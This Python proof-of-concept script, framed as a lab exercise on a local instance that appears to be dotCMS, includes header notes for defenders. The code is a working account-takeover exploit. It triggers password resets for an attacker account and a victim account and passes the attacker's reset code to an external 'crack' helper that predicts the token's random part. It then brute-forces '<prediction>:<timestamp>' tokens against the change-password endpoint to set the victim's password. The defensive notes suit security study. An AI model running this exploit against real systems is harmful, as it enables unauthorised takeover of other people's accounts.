# Lab script exercising a password-reset flow on a local instance
# (https://localhost:8443; the original notes name admin@dotcms.com, so this
# appears to be a dotCMS test install -- confirm).
#
# What the script shows, read from the code below:
#   * two back-to-back calls to /api/v1/forgotpassword, the second bracketed by
#     millisecond wall-clock timestamps;
#   * a code typed in by the operator is handed to an external helper
#     (./randomstringutils/crack), whose first output line is reused as the
#     left half of a token;
#   * tokens of the form "<helper output>:<millisecond timestamp>" are posted
#     to /api/v1/changePassword, one per second, for every millisecond in the
#     bracket.
#
# Review notes for defenders:
#   * A reset token that can be rebuilt from another user's code plus a
#     timestamp is not secret. Reset tokens should come from a CSPRNG
#     (e.g. java.security.SecureRandom on a Java backend) and carry no
#     guessable component.
#   * The loop relies on the change-password endpoint answering many wrong
#     tokens in a row. Per-account / per-source attempt limits and
#     invalidating the pending reset after a few failures remove that margin.
#   * Log signal: a forgot-password request for one account immediately
#     followed by one for a privileged account, then a steady run of
#     "Invalid token" responses from the same client.
import requests
import time
import urllib3
import subprocess

# Certificate checks are switched off for every request below (verify=False);
# presumably the local instance uses a self-signed certificate -- confirm.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def _now_ms():
    """Return the current wall-clock time in whole milliseconds."""
    return int(time.time() * 1000)


base_url = "https://localhost:8443"
forgot_url = f"{base_url}/api/v1/forgotpassword"
change_password_url = f"{base_url}/api/v1/changePassword"

# Step 1: reset request for the first account (userId is blank on the page).
print("Step 1: Sending forgot password for attacker")
requests.post(forgot_url, json={"userId": ""}, verify=False)

# Step 2: reset request for the second account, timed on both sides so the
# server-side timestamp must fall inside [request_time, response_time].
print("Step 2: Sending forgot password for victim")
request_time = _now_ms()
requests.post(forgot_url, json={"userId": ""}, verify=False)
response_time = _now_ms()
print(f"Request time: {request_time}")
print(f"Response time: {response_time}")

# Step 3: the operator supplies the code received for the first account.
observed_code = input("\nEnter code: ").strip()

# Step 4: external helper; argument list form, so no shell is involved.
# Its exit status is not inspected here.
print(f"\nStep 4: Running ./randomstringutils/crack -n 1 {observed_code}")
subprocess.run(["./randomstringutils/crack", "-n", "1", observed_code])

# Step 5: the helper is expected to have written out.txt; only its first
# line is used.
print("Step 5: Reading out.txt")
with open("out.txt", "r") as result_file:
    predicted_value = result_file.readline().strip()
print(f"First line: {predicted_value}")

# Step 6: one candidate token per millisecond in the bracket, one request per
# second. Any response lacking the text "Invalid token" is treated as a hit.
print(f"\nStep 6: Trying tokens from {request_time} to {response_time}")
for candidate_ms in range(request_time, response_time + 1):
    time.sleep(1)
    candidate_token = f"{predicted_value}:{candidate_ms}"
    body = {
        "password": "Aa12345678!",
        "token": candidate_token,
    }
    try:
        reply = requests.post(
            change_password_url, json=body, verify=False, timeout=5
        )
        reply_text = reply.text
        if "Invalid token" in reply_text:
            continue
        print(f"\nSuccess! Valid token found: {candidate_token}")
        print(f"Response: {reply_text}")
        break
    except Exception:
        # Request errors are skipped silently and the next candidate is tried.
        continue
else:
    print("\nNo valid token found in the time range")